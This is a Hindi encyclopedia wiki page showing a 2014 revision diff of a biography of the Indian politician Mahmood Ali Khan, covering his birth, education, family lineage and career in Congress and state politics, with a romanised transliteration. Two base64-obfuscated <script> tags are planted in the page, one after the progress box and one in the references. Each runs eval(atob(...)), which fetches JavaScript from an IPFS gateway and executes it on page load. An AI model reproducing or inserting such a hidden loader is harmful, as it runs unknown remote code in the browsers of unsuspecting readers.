Difference between revisions of "महमूद अली ख़ाँ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''महमूद अली ख़ाँ''' (अंग्रेज़ी: ''Mahmood Ali Khan'' ; जन्म- 16 जून, [[...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 
'''महमूद अली ख़ाँ''' ([[अंग्रेज़ी]]: ''Mahmood Ali Khan'' ; जन्म-  [[16 जून]], [[1920]]; मृत्यु- [[22 अप्रैल]], [[2001]]) [[भारत]] के प्रसिद्ध राजनीतिज्ञों में से एक थे। इन्होंने सन [[1943]] से [[कांग्रेस]] सदस्य के रूप में राजनीतिक गतिविधियों में सक्रिय भागीदारी प्रारम्भ कर दी थी। महमूद अली ख़ाँ [[1968]] में '[[उत्तर प्रदेश लोक सेवा आयोग]]' के 6 [[वर्ष]] के लिए सदस्य नियुक्त किये गये थे। [[1980]] के बाद उन्होंने स्वयं को पूरी तरह से सक्रिय राजनीति से अलग रखा और सांप्रदायिक सद्भाव के कार्यों तथा सामाजिक एवं सांस्कृतिक गतिविधियों में गहरी दिलचस्पी लेते रहे। [[चन्द्रशेखर]] के नेतृत्व वाली '[[जनता पार्टी]]' के सदस्य बने रहे। महमूद अली ख़ाँ [[6 फ़रवरी]], [[1990]] में [[मध्य प्रदेश]] के [[राज्यपाल]] नियुक्त हुए थे। उन्होंने जीवन का अधिकांश समय पिछड़े ग्रामीणों और किसानों में जागृति पैदा करने के कार्यों में व्यतीत किया।
 
'''महमूद अली ख़ाँ''' ([[अंग्रेज़ी]]: ''Mahmood Ali Khan'' ; जन्म-  [[16 जून]], [[1920]]; मृत्यु- [[22 अप्रैल]], [[2001]]) [[भारत]] के प्रसिद्ध राजनीतिज्ञों में से एक थे। इन्होंने सन [[1943]] से [[कांग्रेस]] सदस्य के रूप में राजनीतिक गतिविधियों में सक्रिय भागीदारी प्रारम्भ कर दी थी। महमूद अली ख़ाँ [[1968]] में '[[उत्तर प्रदेश लोक सेवा आयोग]]' के 6 [[वर्ष]] के लिए सदस्य नियुक्त किये गये थे। [[1980]] के बाद उन्होंने स्वयं को पूरी तरह से सक्रिय राजनीति से अलग रखा और सांप्रदायिक सद्भाव के कार्यों तथा सामाजिक एवं सांस्कृतिक गतिविधियों में गहरी दिलचस्पी लेते रहे। [[चन्द्रशेखर]] के नेतृत्व वाली '[[जनता पार्टी]]' के सदस्य बने रहे। महमूद अली ख़ाँ [[6 फ़रवरी]], [[1990]] में [[मध्य प्रदेश]] के [[राज्यपाल]] नियुक्त हुए थे। उन्होंने जीवन का अधिकांश समय पिछड़े ग्रामीणों और किसानों में जागृति पैदा करने के कार्यों में व्यतीत किया।
 +
==जन्म तथा शिक्षा==
 +
कुँवर महमूद अली ख़ाँ 16 जून, 1920 में [[उत्तर प्रदेश]] के एक छोटे से गांव 'जोगीपुरा', [[मेरठ]] में हुआ था। इन्होंने अपनी छठी कक्षा तक की शिक्षा पूर्ण करने के बाद इंटरमीडिएट की परीक्षा मेरठ से उत्तीर्ण की। वर्ष [[1943]] में वे बी.ए. की डिग्री प्राप्त कर चुके थे। महमूद अली ख़ाँ ने 'आगरा विश्वविद्यालय' से एल.एल.बी. की डिग्री हासिल की थी।
 +
====पारिवारिक पृष्भूमि====
 +
इनके पूर्वज परमारवंशी मुस्लिम, जिसे अपनी सांस्कृतिक परम्पराओं पर गर्व था, [[भोज|राजा भोज]] और [[उज्जैन]] के [[विक्रमादित्य|सम्राट विक्रमादित्य]] तथा पूर्वकाल की 'धारानगरी' (वर्तमान में [[धार]]) के कल्याण सिंह के वंशज थे। [[विक्रम संवत]] 1815 में महमूद अली ख़ाँ के पूर्वज [[ग्राम]] जोगीपुरा में आये थे। एक पूर्वज राव भोजीसिंह ने विक्रम संवत 1411 में [[फ़िरोज़शाह तुग़लक़]] के शासन काल में [[इस्लाम धर्म]] स्वीकार कर लिया था। अभी भी [[परिवार]] में [[राजपूत|राजपूतों]] के रीति-रिवाज और अन्य व्यवहार को अपनाया जाता है।<ref name="aa">{{cite web |url= http://mppost.com/sidebar.php?page_id=25|title= मध्य प्रदेश के भूतपूर्व राज्यपाल|accessmonthday=18 सितम्बर|accessyear= 2014|last= |first= |authorlink= |format= |publisher= एमपी पोस्ट|language= हिन्दी}}</ref>
 +
==कुशल खिलाड़ी==
 +
छात्र जीवन में महमूद अली ख़ाँ कुशल खिलाड़ी थे। उनकी जिमनास्टिक और कुश्ती में विशेष रुचि थी। 'एन.आर.ई.सी. कॉलेज' में वे जिमनाजियम में कप्तान और मेरठ कॉलेज में वरिष्ठ हाउस मॉनीटर थे। उन्होंने मेरठ कॉलेज में दो साल की 'यूनिवर्सिटी ट्रेनिंग कोर' (यू.टी.सी.) की ट्रेनिंग भी प्राप्त की थी।
 +
====अभिरुचि====
 +
महमूद अली ख़ाँ सदैव ग्रामीण उत्थान के कार्यों में लगे रहे। जीवन का अधिकांश समय उन्होंने पिछड़े ग्रामीणों और किसानों में जागृति पैदा करने के कार्यों में व्यतीत किया। साम्प्रदाययिक सद्भाव तथा राष्ट्रीय ओर भावनात्मक एकता के कार्यों को वे विशेष महत्त्व देते थे। पुस्तकें पढ़ने का उन्हें शौक था। महमूद अली ख़ाँ की धार्मिक ग्रन्थों में विशेष दिलचस्पी थी। [[भक्ति]] और सूफ़ी आंदोलन का उनके जीवन पर गहरा प्रभाव था।
 +
;भाषा ज्ञान
 +
[[उर्दू]], [[अंग्रेज़ी]], [[हिन्दी]] तथा [[फ़ारसी भाषा]] का भी ज्ञान महमूद अली ख़ाँ को था।
 +
==राजनीतिक शुरुआत==
 +
सन [[1938]] में महमूद अली ख़ाँ छात्र जीवन से ही [[महात्मा गाँधी]] और [[जवाहर लाल नेहरू|पंडित जवाहरलाल नेहरू]] से पेरित होकर [[कांग्रेस|कांग्रेस पार्टी]] में शामिल हो गए। [[1943]] से कांग्रेस सदस्य के रूप में उन्होंने राजनीतिक गतिविधियों में सक्रिय भागीदारी निभाई। गढ़मुक्तेश्वर क्षेत्र में सन [[1946]] में हुए झगड़ों के दौरान गढ़मुक्तेश्वर और [[हापुड़]] के आसपास के क्षेत्र में सांप्रदायिक सद्भाव बनाये रखने के लिये उन्होंने समर्पित भाव से कार्य किया।
 +
====चरण सिंह का सानिध्य====
 +
महमूद अली ख़ाँ का [[1953]]-[[1957]] में [[मेरठ ज़िला|मेरठ ज़िले]] के प्रसिद्ध स्वतंत्रता सेनानी कैलाश प्रकाश और 'काकोरी काण्ड' से जुड़े विष्णु शरद दुबलीश से संपर्क हुआ। वे उनके साथ राजनीतिक गतिविधियों में सक्रिय रहे। सन [[1953]] में [[कांग्रेस]] दे टिकिट पर महमूद अली ख़ाँ [[मेरठ]] नगरपालिका के चुनाव में प्रत्याशी घोषित हुए। [[1957]] में कांग्रेस उम्मीदवार के रूप में तत्कालीन मेरठ ज़िले के दासना विधान सभा क्षेत्र से [[उत्तर प्रदेश]] विधान सभा के सदस्य निर्वाचित हुए और वरिष्ठ नेता [[चरण सिंह|चौधरी चरण सिंह]] के सानिध्य में आकर उनके निकट सहयोगी बने। ग्रामीण क्षेत्रों की उन्नति के लिए चौधरी चरण सिंह के विचारों और सिद्धांतों का महमूद अली ख़ाँ के जीवन पर व्यापक प्रभाव पड़ा। सन [[1957]]-[[1962]] में वे विधायिनी समिति में प्रतिनिधि तथा इसी अवधि में सिंचाई तथा ऊर्जा समिति के सदस्य रहे।<ref name="aa"/>
 +
=='ज़िला जन-कांग्रेस' की स्थापना==
 +
महमूद अली ख़ाँ [[1959]]-[[1960]] में उपनिरीक्षकों की चयन समिति के सदस्य भी थे। [[1967]] में चौधरी चरण सिंह के साथ उन्होंने [[कांग्रेस|कांग्रेस पार्टी]] छोड़ थी और 'ज़िला जन-कांग्रेस'<ref>बाद में भारतीय क्रांतिदल</ref> के संस्थापक, अध्यक्ष और जनकांग्रेस की राष्ट्रीय कार्यकारिणी के सदस्य बने। वर्ष [[1968]] में महमूद अली ख़ाँ [[उत्तर प्रदेश लोक सेवा आयोग]] के 6 वर्ष के लिए सदस्य नियुक्त किये गये।
  
  

Revision as of 09:22, 18 September 2014

mahamood ali khaan (aangrezi: Mahmood Ali Khan ; janm- 16 joon, 1920; mrityu- 22 aprail, 2001) bharat ke prasiddh rajanitijnoan mean se ek the. inhoanne san 1943 se kaangres sadasy ke roop mean rajanitik gatividhiyoan mean sakriy bhagidari prarambh kar di thi. mahamood ali khaan 1968 mean 'uttar pradesh lok seva ayog' ke 6 varsh ke lie sadasy niyukt kiye gaye the. 1980 ke bad unhoanne svayan ko poori tarah se sakriy rajaniti se alag rakha aur saanpradayik sadbhav ke karyoan tatha samajik evan saanskritik gatividhiyoan mean gahari dilachaspi lete rahe. chandrashekhar ke netritv vali 'janata parti' ke sadasy bane rahe. mahamood ali khaan 6 faravari, 1990 mean madhy pradesh ke rajyapal niyukt hue the. unhoanne jivan ka adhikaansh samay pichh de graminoan aur kisanoan mean jagriti paida karane ke karyoan mean vyatit kiya.

janm tatha shiksha

kuanvar mahamood ali khaan 16 joon, 1920 mean uttar pradesh ke ek chhote se gaanv 'jogipura', merath mean hua tha. inhoanne apani chhathi kaksha tak ki shiksha poorn karane ke bad iantaramidiet ki pariksha merath se uttirn ki. varsh 1943 mean ve bi.e. ki digri prapt kar chuke the. mahamood ali khaan ne 'agara vishvavidyalay' se el.el.bi. ki digri hasil ki thi.

parivarik prishbhoomi

inake poorvaj paramaravanshi muslim, jise apani saanskritik paramparaoan par garv tha, raja bhoj aur ujjain ke samrat vikramadity tatha poorvakal ki 'dharanagari' (vartaman mean dhar) ke kalyan sianh ke vanshaj the. vikram sanvat 1815 mean mahamood ali khaan ke poorvaj gram jogipura mean aye the. ek poorvaj rav bhojisianh ne vikram sanvat 1411 mean firozashah tugalaq ke shasan kal mean islam dharm svikar kar liya tha. abhi bhi parivar mean rajapootoan ke riti-rivaj aur any vyavahar ko apanaya jata hai.[1]

kushal khila di

chhatr jivan mean mahamood ali khaan kushal khila di the. unaki jimanastik aur kushti mean vishesh ruchi thi. 'en.ar.ee.si. k aaulej' mean ve jimanajiyam mean kaptan aur merath k aaulej mean varishth haus m aaunitar the. unhoanne merath k aaulej mean do sal ki 'yoonivarsiti treniang kor' (yoo.ti.si.) ki treniang bhi prapt ki thi.

abhiruchi

mahamood ali khaan sadaiv gramin utthan ke karyoan mean lage rahe. jivan ka adhikaansh samay unhoanne pichh de graminoan aur kisanoan mean jagriti paida karane ke karyoan mean vyatit kiya. sampradayayik sadbhav tatha rashtriy or bhavanatmak ekata ke karyoan ko ve vishesh mahattv dete the. pustakean padhane ka unhean shauk tha. mahamood ali khaan ki dharmik granthoan mean vishesh dilachaspi thi. bhakti aur soofi aandolan ka unake jivan par gahara prabhav tha.

bhasha jnan

urdoo, aangrezi, hindi tatha farasi bhasha ka bhi jnan mahamood ali khaan ko tha.

rajanitik shuruat

san 1938 mean mahamood ali khaan chhatr jivan se hi mahatma gaandhi aur pandit javaharalal neharoo se perit hokar kaangres parti mean shamil ho ge. 1943 se kaangres sadasy ke roop mean unhoanne rajanitik gatividhiyoan mean sakriy bhagidari nibhaee. gadhamukteshvar kshetr mean san 1946 mean hue jhag doan ke dauran gadhamukteshvar aur hapu d ke asapas ke kshetr mean saanpradayik sadbhav banaye rakhane ke liye unhoanne samarpit bhav se kary kiya.

charan sianh ka sanidhy

mahamood ali khaan ka 1953-1957 mean merath zile ke prasiddh svatantrata senani kailash prakash aur 'kakori kand' se ju de vishnu sharad dubalish se sanpark hua. ve unake sath rajanitik gatividhiyoan mean sakriy rahe. san 1953 mean kaangres de tikit par mahamood ali khaan merath nagarapalika ke chunav mean pratyashi ghoshit hue. 1957 mean kaangres ummidavar ke roop mean tatkalin merath zile ke dasana vidhan sabha kshetr se uttar pradesh vidhan sabha ke sadasy nirvachit hue aur varishth neta chaudhari charan sianh ke sanidhy mean akar unake nikat sahayogi bane. gramin kshetroan ki unnati ke lie chaudhari charan sianh ke vicharoan aur siddhaantoan ka mahamood ali khaan ke jivan par vyapak prabhav p da. san 1957-1962 mean ve vidhayini samiti mean pratinidhi tatha isi avadhi mean sianchaee tatha oorja samiti ke sadasy rahe.[1]

'zila jan-kaangres' ki sthapana

mahamood ali khaan 1959-1960 mean upanirikshakoan ki chayan samiti ke sadasy bhi the. 1967 mean chaudhari charan sianh ke sath unhoanne kaangres parti chho d thi aur 'zila jan-kaangres'[2] ke sansthapak, adhyaksh aur janakaangres ki rashtriy karyakarini ke sadasy bane. varsh 1968 mean mahamood ali khaan uttar pradesh lok seva ayog ke 6 varsh ke lie sadasy niyukt kiye gaye.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. 1.0 1.1 madhy pradesh ke bhootapoorv rajyapal (hindi) emapi post. abhigaman tithi: 18 sitambar, 2014.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. bad mean bharatiy kraantidal

sanbandhit lekh